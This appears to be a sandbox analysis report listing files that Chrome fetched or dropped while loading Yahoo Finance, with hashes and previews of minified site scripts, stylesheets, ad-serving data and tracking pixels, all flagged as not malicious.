                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293055408241309
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:qqYhfIy1QDghAgtzE4NAtnIZESKxSEoFYEsstzkRWtTazMfjIDo4djfccaPIfqLC:rmIy1gnlXsEtxSRs5RWtXaO9QwNAkqsO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CF5E56879AEB634BE2D265576AD25939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:823F3EC135A623DA7DFC43BDA502328022C2247E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:07A8B3BAC87EF5E3A78ED99295266C18332FA772F59CE89B4DAF763734D617CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E48B32C88D46F58016C500928E1040A9F6C061E5DF261F6623B347CEDFDA5721FEDD4D21D9293B541884D40C43AF830ACA8D655C559DEE4D65C979AE739A9A6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadRecentlyViewedTickers.Dccchr8e.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{f as o,l as d}from"./logUtil.hOue7iAU.js";import{d as f}from"./commonUtil.CI22_Irn.js";import{l as y}from"./loadQuote.D9BAmXuK.js";async function m(r,{count:l=15,silent:n=!1,reuse:s=!1}){const[i]=await f(["recentlyViewedTickers"],r),t=i.getRecentlyViewedTickers();if(s&&(t!=null&&t.length))return t;try{const a=await o(r,{isRelative:!0,pathname:"/xhr/recently-viewed-tickers",perfLabel:"loadRecentlyViewedTickers",query:{}}),e=(a==null?void 0:a.slice(0,l))||[];if(e&&e.length>0)try{await y(r,{fields:["longName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","shortName","priceHint"],symbols:e})}catch{}return n||i.updateRecentlyViewedTickers(e),e}catch(c){d(r,{},{data:c,perfLabel:"loadRecentlyViewedTickers"})}}export{m as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2859)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.441960451870491
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:3l0ywBIoWswc8dbiAbG3/+DUo+ejt23MvkPAAkGcCD3ug+bi3ssTApLvn:uBwhXHCP+3+ejt2cvkYAkBCD3ZuwspLv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DDC3D67AD7A283A7C4E8BDE9841C06F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9D66663FB2F90B92F1B29226202743C2EED7537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5F6F2FE8990342CA73244E3659EF7D868C01874178970E020DCDF09DB473EDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D6FC97F376918F6F63054DFE0BC4D974C09DD0ABD3E5B398044683B625221E135F485E9546D24FB10CB473C63DE312966B7EF995FEFE052EA79E72F02B0D06C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,c as I,e as S,b as P,d as E,f as w,j as k,i as g,q as p,U as R,k as L,l as b,F as B,G as F,u as z,g as A,a as D,v as M,y as T}from"./scheduler.Dr9AAxFe.js";import{S as U,i as W,t as v,g as H,a as O,e as J,c as K,b as Q,m as X,d as Y}from"./index.DCSmZEjO.js";import{A as Z}from"./AdGroup.CD4BTzLP.js";import{r as $}from"./resizeUtil.BFOdtaWL.js";import{r as x}from"./ads.DhuB_mth.js";import{O as ee}from"./commonUtil.CI22_Irn.js";const se=t=>({}),V=t=>({}),te=t=>({}),N=t=>({refreshAds:t[5]}),ie=t=>({}),q=t=>({});function G(t){let e,r,f,l,h;const d=t[7].sidebar,n=I(d,t,t[6],V);return l=new Z({props:{ids:t[4],className:"tw-m-0 tw-pb-2"}}),{c(){e=S("div"),r=S("div"),n&&n.c(),f=P(),K(l.$$.fragment),this.h()},l(i){e=E(i,"DIV",{class:!0});var u=w(e);r=E(u,"DIV",{class:!0});var a=w(r);n&&n.l(a),f=k(a),Q(l.$$.fragment,a),a.forEach(g),u.forEach(g),this.h()},h(){p(r,"class","tw-sticky tw-top-32"),p(e,"class","sidebar yf-hvsrhi")},m(i,u){L(i,e,u),b(e,r),n&&n.m(r,null),b(r,f),X(l,r,null)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 728x90, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.42423036513978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:4WK1h6A1aWwh82lYSKwT3WYYjVs14T3fyJ3VYpwMGiiPmDUIeluL9F:411LvnLo3Cj84eJ3mpnbiTzluL9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3D4FDE04AFA73E8EEBD3428F38EFF2D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:48EDC8FD40C27E340982289D1117645D38238216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C64BC40632FA695CC9D2625524E1708A17F7C331FAB12A9CC46A78EDDC362257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:36F7679A6F4E13692D0C6B54C53A5AD810E05393FFD77138AF78DF3A1162620D5AF69649D9F3D0C872BC1840880DF3C9F8F8F217533BD04EEB383F54C4E53FDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2349C541FCE311E98FA2B11E968BC75D" xmpMM:DocumentID="xmp.did:5535FCF5211511EA802EAD89E816F6E6" xmpMM:InstanceID="xmp.iid:5535FCF4211511EA802EAD89E816F6E6" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5d6b3509-6160-e448-a781-22791a52d304" stRef:documentID="adobe:docid:photoshop:58d301f8-fb0d-6744-b0fd-17337b2858bc"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=TTIwVEtZR0UtRy1MVkhC&google_push=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (305)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.949111560169397
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:1RzDkAfMEXKRDwBOhTRgR/V59uV3Ox00ldzUARMMp:1RvkAkEalwBOJRgOV3O6yUARMo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:760F50663F2FCE6756C70F3ACB09BEBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:123A49FA085D0C4A9194B20B128DAF632DFF8719
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ABB683C6985EAB0E41727E636B9D869DD78EAF84FD113FDFDCCF39314466EE52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:457102CC2F3223E92975CD1199C3B229088ACE06E52B12453CE454F84276FC9DE2DD802C9219D886EDB0B1856F6367466327F022217C79ECF399126967668D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectionWithSidebar.Bf-AwOOu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.container.yf-hvsrhi{container-type:inline-size}.column-container.yf-hvsrhi{display:flex;width:100%;gap:var(--space-8) var(--layout-gutter);min-height:20rem;margin-bottom:var(--space-8)}.column.yf-hvsrhi{flex:1}.sidebar.yf-hvsrhi{width:300px}@container (max-width: 982px){.sidebar.yf-hvsrhi{display:none}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.829337993012974
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:beUACPGrCB3Sxq4G23q0ADnDlk3JQyurOL7PWmNPO84sKIoyAbS:03MYPxr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EF2B3D06479DECD456E71D87ABDC77EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:524551142EE99E859F089C5E990CE4DBA883BE21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:80360CAFC55AC7BB01EE150CF5ADA480E4C89FC8DB27C643D622AE224C236E64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:31A69D0748604B508C0614DB4068480C88D0297EED0E3BAD891D3E27083DCC356C3CF2A112B076B6C5811DCBCA838169CE50FE48AD6DEBB3E969253F9B4CB9C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=d006e00fff456bcd:T=1728414931:RT=1728414931:S=ALNI_MbmcYZ9HuuICar1nxi5y_NnhoTZBw",1762110931,"/","yahoo.com",1],["UID=00000f31c4a9c4d8:T=1728414931:RT=1728414931:S=ALNI_MaFC_n_rM_r8Lh_3P61N37aEmj-Og",1762110931,"/","yahoo.com",2]],[138466991465],[6636161008],[5462617191],[3473808467],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsnANYaWTPgnxUy_pTOBP2R1q8nOfcyEYr396MBnCh7XkL_pTtBrilfWF_5uOTLq4azprt7zh5p0dmRm9cYMoUo5J3_DkL9b13_GI02c9cOfFGbr","CNHFnLC__4gDFdMHVQgdVNgYcw",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=635fd45a3efe44d8:T=1728414931:RT=1728414931:S=AA-AfjYrc13_QyaZ9VZMQdl1ZZra",1743966931,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):297
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.712616563263837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:F/YR8YUGQCK4FdhD94oRzQywXEXyw3n94Epnt9vVD:FFYUUKYDRR8ylXyqn5pXv9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5431755EFEDEF716D3324875A510AFAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FEFC809B0EF8F260ECC3B2B751E8CD8ECFF80AB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B0168D0934BBBDA0C1F83EF273E59FA51FE9EC19A35EFF9405A4A2F1C4C3E9E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E4931F80DD964383F7CE42F96C2A8B016699D43364FA11B52D2386DFC9F1C7ABBA0D043D18585FD171977E564E2180B8132718B1C39B699D2CAC231983ACBC6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as r}from"./43.CtYdpA_T.js";const e=()=>{const s=r;return{page:{subscribe:s.page.subscribe},navigating:{subscribe:s.navigating.subscribe},updated:s.updated}},n={subscribe(s){return e().page.subscribe(s)}},i={subscribe(s){return e().navigating.subscribe(s)}};export{e as g,i as n,n as p};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:H3:X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5CD6E5A6E670FE5B4A9C6BB6E30181A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:303A23B65CC6675EED483BE7E8426B3B64013FD4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C1E7CA98E56A457702DF54B05786DDB19A3D43CD5CA652BE6944758741CBA67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0CEB4499D15A36A0F5EB0D165DB07D7DCCACA0CF69401315376B94D02C4D7FABA69119C31F95559D9C946E397B8500B22BE1BE3E2F24F95DB4FEBA440F21A57F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlUi7xLfpsp0hIFDejd-wA=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:CgkKBw3o3fsAGgA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1107)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.310624183859769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:gmF1qX95uc8WdZHgvaBPcsBItArS/SAGIMShSbSEAP34vn:gmF1eIWDwaBIqr+GINSXvvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA000C6C6667D19116806B7B7952DB74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B83A42C58537264F4AF276902B4DB0753185EA3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1D2D1869FE759F5E1B180FF955455C62635BB0BC6FF3B025E583808AD6D9AFFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E4C7AEC96040251F8FEC5827247AA6B011E3BFA6D04DE855BF7896067FA20580106444CC41C6F34FED424BE5A3C727AB557906F8010BF817BEF7F005675F1CFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SkeletonLoader.B0llAjab.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as _,A as n,e as h,d as I,f as y,i as f,B as c,U as r,k as v,n as u,Y as g,T as N}from"./scheduler.Dr9AAxFe.js";import{g as k}from"./spread.CgU5AtxT.js";import{S,i as b}from"./index.DCSmZEjO.js";function q(s){let e,a,d=[{class:a="loader "+s[0]+" "+s[2]+" "+s[1]},{"data-testid":"skeleton-loader"},s[3]],l={};for(let t=0;t<d.length;t+=1)l=n(l,d[t]);return{c(){e=h("div"),this.h()},l(t){e=I(t,"DIV",{class:!0,"data-testid":!0}),y(e).forEach(f),this.h()},h(){c(e,l),r(e,"wideImg",s[2]),r(e,"yf-10mmfrb",!0)},m(t,i){v(t,e,i)},p(t,[i]){c(e,l=k(d,[i&7&&a!==(a="loader "+t[0]+" "+t[2]+" "+t[1])&&{class:a},{"data-testid":"skeleton-loader"},i&8&&t[3]])),r(e,"wideImg",t[2]),r(e,"yf-10mmfrb",!0)},i:u,o:u,d(t){t&&f(e)}}}function w(s,e,a){const d=["type","className","wideImg"];let l=g(e,d),{type:t="default"}=e,{className:i=""}=e,{wideImg:o=!1}=e;return s.$$set=m=>{e=n(n({},e),N(m)),a(3,l=g(e,d)),"type"in m&&a(0,t=m.type),"className"in m&&a(1,i=m.className),"wideImg"in m&&a(2,o=m.wideImg)},[t,i,o,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (36227), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):36231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.124278749729479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:KN3Bofrb9dLr+xnY+ClcdLrWmTjhiSJ/ZPon120PgPalkpGY0+LRhvpmiFAuOkGJ:q3inGxYtlQTliSJ/ZPonk0PgPalkpGYi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7154CAE4D207A2FA685AB088206A42F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3A712F31085CC2948F08821F1EB0AF334F166090
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4DDFAB277D3E5C6C53C5E9CFD778CC6273A19D3B411343C6A86FF0517A3C3F81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B886FF21D343F9E9D2F95CDB427D9C423AC4E0043D2F82971ACFB0BEC66AA282212C6AFE93DB4FC0887F9C2273396D7A5CD0FDC557431E69FE445894C7B8399F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:if (!window.mraid) {document.write('\x3cdiv id="ad_unit"\x3e');}document.write('\x3cstyle\x3ediv{margin:0;padding:0;}.abgcp{height:15px;padding-right:1px;padding-top:1px;padding-left:9px;padding-bottom:9px;right:0px;top:0px;position:absolute;width:31px;z-index:2147483646;}.abgc{display:block;height:15px;position:absolute;right:1px;top:1px;text-rendering:geometricPrecision;z-index:2147483646;}.abgb{display:inline-block;height:15px;}.abgc,.abgcp,.jar .abgc,.jar .abgcp,.jar .cbb{opacity:1;}.abgc{cursor:pointer;}.cbb{cursor:pointer;height:15px;width:15px;z-index:2147483646;background-color:#ffffff;opacity:0;}.cbb svg{position:absolute;top:0;right:0;height:15px;width:15px;stroke:#00aecd;fill:#00aecd;stroke-width:1.25;}.abgb{position:absolute;right:16px;top:0px;}.cbb{position:absolute;right:0px;top:0px;}.abgs{display:none;height:100%;}.abgl{text-decoration:none;}.abgs svg,.abgb svg{display:inline-block;height:15px;width:auto;vertical-align:top;}.abgc .il-wrap{background-color:#ffffff;height:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33446
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.829911208274837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:a/eUACPGrCB3Sxq4G23q0ADnDlk3JQyurOL1va/XmPO84sKIoyAbS:t3MGvymr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:943078CB2D937A4F3793C48570C7CA25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:57E2B5C1E1E0F71E0136E9F20B02782E44477C16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5754C787B136C12BF1797779592B974B67C5A32462DFDE0DF1DE91AA79F8EE29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4CDD723F9FCBE1DC4938765DC944BD6657630D2EBCA149A6C7336CE99917D8B88709BA16C601D46525172F2098BCFCD22638C512480759F4E87F0A60868B6EF6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
